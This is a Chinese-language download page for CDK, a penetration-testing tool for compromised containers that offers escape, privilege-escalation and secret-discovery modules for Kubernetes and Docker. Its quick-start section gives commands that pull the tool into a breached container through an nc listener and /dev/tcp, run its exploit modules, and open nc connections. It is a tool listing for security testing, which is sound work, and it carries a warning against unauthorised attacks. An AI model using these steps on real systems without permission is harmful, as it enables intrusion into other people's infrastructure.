【容器渗透工具】CDK v1.5.3

简介

CDK(Cloud Defense Kit)是一款为容器环境定制的渗透测试工具,在已攻陷的容器内部提供零依赖的常用命令及PoC/EXP,专注于检测和利用Kubernetes、Docker及云环境中的安全漏洞。它可以模拟真实攻击场景,帮助用户识别集群配置、权限管理以及容器镜像中的安全问题。CDK支持多种云平台和容器化环境,提供了诸如容器逃逸、权限提升、敏感信息泄露检测等功能,适用于安全研究人员和运维人员进行安全测试和防护评估。

文档:CDK Home CN · cdk-team/CDK Wiki

演示视频

快速使用

  • 向容器内下载CDK工具,不使用wget和curl
    • 公网服务器执行:nc -lvp 999 < cdk
    • 容器内部执行:cat < /dev/tcp/<公网机IP>/<公网机监听端口> > cdk
  • 对环境的敏感信息进行收集
./cdk_linux_amd64_upx eva --full
  • 列出工具的攻击模块
./cdk_linux_amd64_upx run --list
  • 执行指定EXP
./cdk run <script-name> [options]
  • 模拟执行nc命令
监听
cdk nc -l -v -p <port>

连接
cdk nc -h <host> -p <port>

下载

✈️ 全球下载通道

🚀 极核加速通道

THE END
想说的话 1  QQ & 微信交流群: 点击查看加群方式
2  本站运营不易,以真心❤️换真心💕,如果帮助到你,可以 推荐给朋友 或者 开通金贝会员 支持一下本站!
3  请不要进行任何非授权的网络攻击,如果造成任何损失均由使用者本人负责,与本站和原作者无关!
点赞92 分享
【容器渗透工具】CDK v1.5.3 - 极核GetShell
【容器渗透工具】CDK v1.5.3
⭕此处是支付积分以获取极核加速下载通道,非强制购买!
💎您可以赞助本站,获取金贝会员畅享极核加速下载通道!
✔️在本文回复即可解锁全球下载通道!
10积分
付费阅读
茶谈区 共6条

请登录后发表评论